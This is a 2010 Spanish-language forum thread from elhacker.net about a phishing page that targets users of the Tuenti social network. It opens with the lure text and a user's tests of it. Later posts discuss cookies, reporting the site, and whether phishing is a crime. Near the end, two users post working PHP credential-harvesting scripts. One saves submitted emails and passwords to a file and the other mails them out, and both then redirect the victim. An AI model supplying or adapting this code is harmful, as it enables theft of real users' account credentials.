Foro de elhacker.net

Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: dani__ en 29 Mayo 2010, 17:10 pm



Título: Phishing en tuenti
Publicado por: dani__ en 29 Mayo 2010, 17:10 pm
Lo primero no sabia donde ubicar este post asi que agradecere a algun moderador que lo cambie si esta mal ubicado.

Haber os cuento hoy entre en mi tuenti y me encontre con una "invitacion a una pagina".

En esta te explicaba como aumentar tus visitas mediante un supuesto bug.

Citar
Si deseas aumentar las visitas del contador de tu pagina tuenti. Solo trata de hacer lo que dice el siguiente manual.

1º entra a esta direccion: www.equipotuenti.t35.com

2º logeate y entra desde esa dirrecion para poder entrar en modo bug.

3º Vamos a deshabilitar las imágenes del navegador para que tarde menos la página en cargar. Para ello desde Firefox (creo que iMacros también está disponble para explorer), vamos a “Herramientas” -> “Opciones” y en la ventana que se abre en “Contenido”. Desmarcamos la casilla de “Cargar imágenes automaticamente”. Ahora las visitas se irán aumentando más rápido.
Vamos a hacer más eficiente el método. Para ello pinchamos con el botón derecho encima del nombre del fichero que creamos al grabar (en la parte del superior del imacros) y le damos a “EDITAR MACRO”. Se nos abrirá en un editor de texto, mostrandonos el contenido del fichero. Será de la forma:

VERSION BUILD=6111228 RECORDER=FX
TAB T=1
URL GOTO= TAG POS=1 TYPE=A ATTR=TXT:NombreApellidos
Borramos todo y ponemos
URL GOTO=

Donde pone código pondremos el identificador del usuario, que lo podeis ver al acceder al perfil en la dirección que aparece en el navegador. Es decir poneis

URL GOTO=

Es necesario poner al menos la dirección de 2 usuarios ya que si no NO se cuentan las visitas

Guardais el fichero sobreescribiendo el anterior. Así podeis ir poniendo en una línea varios usuarios diferentes y se les irán aumentando las visitas a
todos.

El servidor parece un servidor gratuito y como no me fio de estas cosas me puse a probarlo:
No me di cuenta y sin cerrar mi usuario entre en esta pagina y me invente un login y un pass. Y casualmente me carga mi usuario que tenia abierto (es decir aparentemente no hace nada)
Luego hice otra prueba cerrando mi tuenti y con un usuario falso me llevo a la pagina de login real de tuenti pero ni si quiera me dio error de que el usuario no existia.

Mi conclusion es que esta pagina solo redirecciona a Tuenti, despues de quedarse con tu contraseña.

Yo no se programacion web asi que si alguien pudiera analizar el codigo fuente y comprobar que de verdad es un xploit se lo agradeceria (tengo curiosidad)


Título: Re: Phishing en tuenti
Publicado por: SpuTniK. en 29 Mayo 2010, 17:29 pm
Tiene toda la pinta de ser un XPLOIT, no es lo mismo Xploit (Fake) que Exploit

No se como la gente puede picar en este tipo de cosas u.u

Saludos!


Título: Re: Phishing en tuenti
Publicado por: @synthesize en 29 Mayo 2010, 17:59 pm
No, a mi no me vas a robar la contraseña amigo.


Título: Re: Phishing en tuenti
Publicado por: dani__ en 29 Mayo 2010, 18:00 pm
Tiene toda la pinta de ser un XPLOIT, no es lo mismo Xploit (Fake) que Exploit

No se como la gente puede picar en este tipo de cosas u.u

Saludos!

Ya cambie lo de xploit


Título: Re: Phishing en tuenti
Publicado por: dani__ en 29 Mayo 2010, 18:02 pm
y una pregunta hay alguna forma de denunciar estas paginas o algo? (que no sea hackearlas)


Título: Re: Phishing en tuenti
Publicado por: Xh4xor23 en 29 Mayo 2010, 18:11 pm
Si, definitivamente es un xploit... Ademas si intentas acceder alguna de las condiciones de uso te salta error.
Lo que hace es que introduzcas tu mail/password lo da como bueno y lo registra en un log (que probablemente envie al Lammer) luego para que no te des cuenta redirecciona con Tuenti (verdadero).
Es más.. Necesita las cookies para coger tu pass por si fuese falsa... asi que cuidado.

No se si al redireccionarte a tuenti comprueba la veracidad de tus datos.. habria que mirarlo..
Salu2

P.D - En cuanto a denunciar sin hackear.. En la pagina de Tuenti , ellos si quieren se encargarán de evitar que se publiquen esos eventos.

Salu2


Título: Re: Phishing en tuenti
Publicado por: dani__ en 29 Mayo 2010, 18:27 pm
Es más.. Necesita las cookies para coger tu pass por si fuese falsa... asi que cuidado.
no entiendo esto. ¿que quieres decir que si pongo un password falso mirara mis cookies?¿O que para sacar el password de el xploit lee las cookies?


Título: Re: Phishing en tuenti
Publicado por: Xh4xor23 en 29 Mayo 2010, 18:29 pm
Es más.. Necesita las cookies para coger tu pass por si fuese falsa... asi que cuidado.
no entiendo esto. ¿que quieres decir que si pongo un password falso mirara mis cookies?¿O que para sacar el password de el xploit lee las cookies?

Supongo que pongas o no la verdadera mirara tus cookies para cogerla.. Por eso te dice que las tengas activadas..

Un salu2


Título: Re: Phishing en tuenti
Publicado por: dani__ en 29 Mayo 2010, 18:38 pm

Supongo que pongas o no la verdadera mirara tus cookies para cogerla.. Por eso te dice que las tengas activadas..
[/quote]

Ya te entiendo esque al principio crei que decias que la pagina miraba las cookies del tuenti real con lo cual no influia lo que pusieras esta pagina


Título: Re: Phishing en tuenti
Publicado por: Xh4xor23 en 29 Mayo 2010, 18:41 pm

Supongo que pongas o no la verdadera mirara tus cookies para cogerla.. Por eso te dice que las tengas activadas..

Ya te entiendo esque al principio crei que decias que la pagina miraba las cookies del tuenti real con lo cual no influia lo que pusieras esta pagina
[/quote]

Eso es lo que te queria decir.. que te va a registrar todas las cookies tanto del tuenti oficial como de cualquier otra cosa.. por esa razon igual te redirige.

Aunque como te digo no estoy seguro, no estudio xploits no es mi campo.
Un salu2


Título: Re: Phishing en tuenti
Publicado por: [L]ord [R]NA en 29 Mayo 2010, 22:01 pm
esto va en Zona de Bugs y Exploits, no en la zona de malware


Título: Re: Phishing en tuenti
Publicado por: winroot en 30 Mayo 2010, 00:59 am
esto va en Zona de Bugs y Exploits, no en la zona de malware
concuerdo
para lo otro, el navegador gestiona las cookies, de manera que solo el sitio que las crea pueda   usarlas, y que en este caso. el sitio falso no puede  consultar las cookies del sitio real.
sino mal recuerdo, en las cookies hay un  campo llamado site, y que  el navegador si por ejemplo  elhacker.net pide  cookies, mira todas las cookies y solo le entrega al servidor la que el campo site sea elhacker.net.
creo que es algo así como funcionan, pero estoy seguro que un sitio no puede leer cookies de otro sitio en un navegador sin bugs de cookies, y un  entorno normal.
saludos!


Título: Re: Phishing en tuenti
Publicado por: Dracomega en 30 Mayo 2010, 13:05 pm
Ayer hice un fake de tuenti xD

Me parecio demasiado facil, que hasta da miedo...

La falsificacion de web es delito?
Esta claro que de tuenti si, por que es una marca registrada, ¿Pero de una web que no tendria marca registrada?

Un saludo


Título: Re: Phishing en tuenti
Publicado por: winroot en 30 Mayo 2010, 15:05 pm
Ayer hice un fake de tuenti xD

Me parecio demasiado facil, que hasta da miedo...

La falsificacion de web es delito?
Esta claro que de tuenti si, por que es una marca registrada, ¿Pero de una web que no tendria marca registrada?

Un saludo
depende del país, pero el fishing también es delito.
saludos!


Título: Re: Phishing en tuenti
Publicado por: SpuTniK. en 31 Mayo 2010, 00:05 am
El Phising es delito en todos lados, ¿de verdad es tan fácil hacer un fake? ... tendré que plantearme aprender PHP en verano  :rolleyes:

Saludos!


Título: Re: Phishing en tuenti
Publicado por: Elemental Code en 31 Mayo 2010, 01:21 am
que me digan lo que quieran pero yo ya la reporte a gooogle y a firefox como sitio de suplatacion de identidad.


 >:(


Vayan a la ESC
Aprendan MATEMATICA
Aprendan LOGICA
y despues aprendan que existen formas mejores de "Hackear" Tuenti  :xD


Título: Re: Phishing en tuenti
Publicado por: sirdarckcat en 31 Mayo 2010, 02:20 am
avisenle a tuenti.. para que quiten la web security@tuenti.com podria funcionar o si saben ingles, pues abuse@t35.com notificandoles.


Título: Re: Phishing en tuenti
Publicado por: dani__ en 31 Mayo 2010, 15:39 pm
que me digan lo que quieran pero yo ya la reporte a gooogle y a firefox como sitio de suplatacion de identidad.


 >:(


Vayan a la ESC
Aprendan MATEMATICA
Aprendan LOGICA
y despues aprendan que existen formas mejores de "Hackear" Tuenti  :xD

Eii loo encontre yo XD


Título: Re: Phishing en tuenti
Publicado por: murdock_ en 29 Julio 2010, 22:55 pm
El Phising es delito en todos lados, ¿de verdad es tan fácil hacer un fake? ... tendré que plantearme aprender PHP en verano  :rolleyes:

Saludos!

Pues tan fácil como copiar el código fuente de la página jeje


Título: Re: Phishing en tuenti
Publicado por: randomcito en 1 Agosto 2010, 14:16 pm
y una pregunta hay alguna forma de denunciar estas paginas o algo? (que no sea hackearlas)

Puedes denunciarlo, pero no te suelen hacer ni puto caso, traducido al castellano.


Título: Re: Phishing en tuenti
Publicado por: Debci en 1 Agosto 2010, 15:27 pm
El Phising es delito en todos lados, ¿de verdad es tan fácil hacer un fake? ... tendré que plantearme aprender PHP en verano  :rolleyes:

Saludos!
Ni eso necesitas...

Saludos


Título: Re: Phishing en tuenti
Publicado por: Zazú en 2 Agosto 2010, 05:09 am
Si se necesitan conocimientos de PHP, pero muy muy basicos para la parte en las que se guardan los datos ;)


Título: Re: Phishing en tuenti
Publicado por: Debci en 2 Agosto 2010, 11:09 am
Si se necesitan conocimientos de PHP, pero muy muy basicos para la parte en las que se guardan los datos ;)
Hay scripts php ya pre-diseñados por todas partes sobre como hacerlo...

WGET+Script escritura en base de datos y obtener datos de un Get(googlea)+ un poco de conocimientos en otro lenguaje de programación.


Saludos


Título: Re: Phishing en tuenti
Publicado por: Zazú en 2 Agosto 2010, 11:59 am
Si ya se, es fácil pero hay gente que no es ni siquiera capas de modificar la dirección a la que se envian los datos (desde el html)
Yo se que es MUY fácil el codigo pero igual  ;)

Código
  1. <?php
  2. $email=$_POST[email];
  3. $password=$_POST[pass];
  4. $a=fopen("passwords.txt","a");
  5. $escribir="\n\n Email: ".$email."   \n\n Password:".$password." ";
  6. $b=fwrite($a,$escribir);
  7. fclose($a);
  8. header("location: http:www.google.com");
  9. ?>
  10.  
  11.  


 :silbar:


Título: Re: Phishing en tuenti
Publicado por: Caselles en 30 Agosto 2010, 17:39 pm
Si ya se, es fácil pero hay gente que no es ni siquiera capas de modificar la dirección a la que se envian los datos (desde el html)
Yo se que es MUY fácil el codigo pero igual  ;)

Código
  1. <?php
  2. $email=$_POST[email];
  3. $password=$_POST[pass];
  4. $a=fopen("passwords.txt","a");
  5. $escribir="\n\n Email: ".$email."   \n\n Password:".$password." ";
  6. $b=fwrite($a,$escribir);
  7. fclose($a);
  8. header("location: http:www.google.com");
  9. ?>
  10.  
  11.  


 :silbar:
¿No seria mejor asi?
Código:
<?php
$email=$_POST[email];
$password=$_POST[pass];
mail("Pass tuenti","Email: ".$email."  Pass: ".$password." ^^","caselles@gmail.com","tuemail");
header("location: http:www.tuenti.com");
?>
:B